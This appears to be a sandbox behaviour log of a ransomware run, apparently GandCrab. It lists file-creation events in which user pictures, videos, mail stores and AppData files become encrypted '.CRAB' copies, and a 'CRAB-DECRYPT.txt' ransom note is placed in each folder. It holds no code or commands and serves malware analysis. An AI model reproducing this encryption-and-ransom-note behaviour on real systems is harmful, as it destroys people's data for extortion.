Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\IXlZ1vW89Rj9\mWsJT5P5\rfY_dCONpJgk3xeC\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\IXlZ1vW89Rj9\mWsJT5P5\rfY_dCONpJgk3xeC\-unnSryIlzxHq.png.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\IXlZ1vW89Rj9\mWsJT5P5\rfY_dCONpJgk3xeC\T_3nACxnQmqJsYbQv75.bmp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\IXlZ1vW89Rj9\mWsJT5P5\S9KYXdU.gif.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\IXlZ1vW89Rj9\mWsJT5P5\tdw_upbls-pYdXlK.gif.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\IXlZ1vW89Rj9\mWsJT5P5\vRa-GgFSNFtqGb\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\IXlZ1vW89Rj9\mWsJT5P5\vRa-GgFSNFtqGb\ITrClimsmj0dcFOj.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\IXlZ1vW89Rj9\mWsJT5P5\vRa-GgFSNFtqGb\_1KXs3qbwtELT4.png.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\IXlZ1vW89Rj9\R-TTiU3ApXzSk-uMvp.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\qfS5n -.bmp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\_6PB1F31Iq38d fN.gif.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\X1sa80V6zv9l\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\X1sa80V6zv9l\VHpKu6M.bmp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\X1sa80V6zv9l\X8FCoH MJddf.bmp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\INLkuecMD1i-hl_.png.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Z6UQ\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Z6UQ\JDqSVpalc.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Z6UQ\zuGweh5ph-jZ_GzWq_Zm.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\PrintHood\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Recent\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Saved Games\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Searches\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Searches\Everywhere.search-ms.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Searches\Indexed Locations.search-ms.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\SendTo\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Start Menu\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Templates\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\28tepKgm7SPDM1K.flv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\2UjJZGE4.avi.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\3bCDT YwV3usd.mkv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\63G1gdYwD.flv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\ftFUoAxhiA2Sy1x.flv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\GkKLAvO_DUt\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\GkKLAvO_DUt\1HKrkwkqeGiIRmS_sgPp.mkv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\GkKLAvO_DUt\F6tL72B90cRVzNs60ff.flv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\GkKLAvO_DUt\FR6vj-T\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\GkKLAvO_DUt\FR6vj-T\IMm8B4ZjBST50PsAyp.mkv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\GkKLAvO_DUt\UZ J_r_RGm_h1eMSxK99.mp4.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\GkKLAvO_DUt\Xf_Ca2CSNx5V1Nf.avi.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\skbrwB.mp4.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\V1iE651jJI-oldxnkVu.mp4.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\VtPSV4Ogd\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\VtPSV4Ogd\bEPBqAT-\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\VtPSV4Ogd\bEPBqAT-\jYGYRuFd8iRGc_pjE.mkv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\VtPSV4Ogd\bEPBqAT-\Uvu4BxCkd9Zlg D9xDq\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\VtPSV4Ogd\bEPBqAT-\WQEC-ds0qxud4-_yNrsh.swf.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\6rOSLudX8YP\_IvAf eF0-.flv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\DFXNGr5HZHKX.avi.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\LvM3NnI30UZC9LWbeC6d\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\mWR6xwx5-1Jm.flv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\qiAswr9CaS\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\qiAswr9CaS\8oVaD6rnP6MILA3.flv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\qiAswr9CaS\gMBI.flv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\qiAswr9CaS\jZ8QdVxL8cDNHwsHZH.swf.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\VISGPbj0UIvSr-mjztz.flv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Application Data\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\History\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Credentials\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\1NBUR4HR\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\6ASVN7J7\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\D68G7BIJ\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\index.dat.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\KQMHSVKD\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.bak.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\01_Music_auto_rated_at_5_stars.wpl.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\02_Music_added_in_the_last_month.wpl.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\03_Music_rated_at_4_or_5_stars.wpl.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\04_Music_played_in_the_last_month.wpl.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\05_Pictures_taken_in_the_last_month.wpl.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\06_Pictures_rated_4_or_5_stars.wpl.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\07_TV_recorded_in_the_last_week.wpl.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\08_Video_rated_at_4_or_5_stars.wpl.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\09_Music_played_the_most.wpl.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\10_All_Music.wpl.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\11_All_Pictures.wpl.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\12_All_Video.wpl.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.chk.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.log.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb00001.log.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\oeold.xml.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
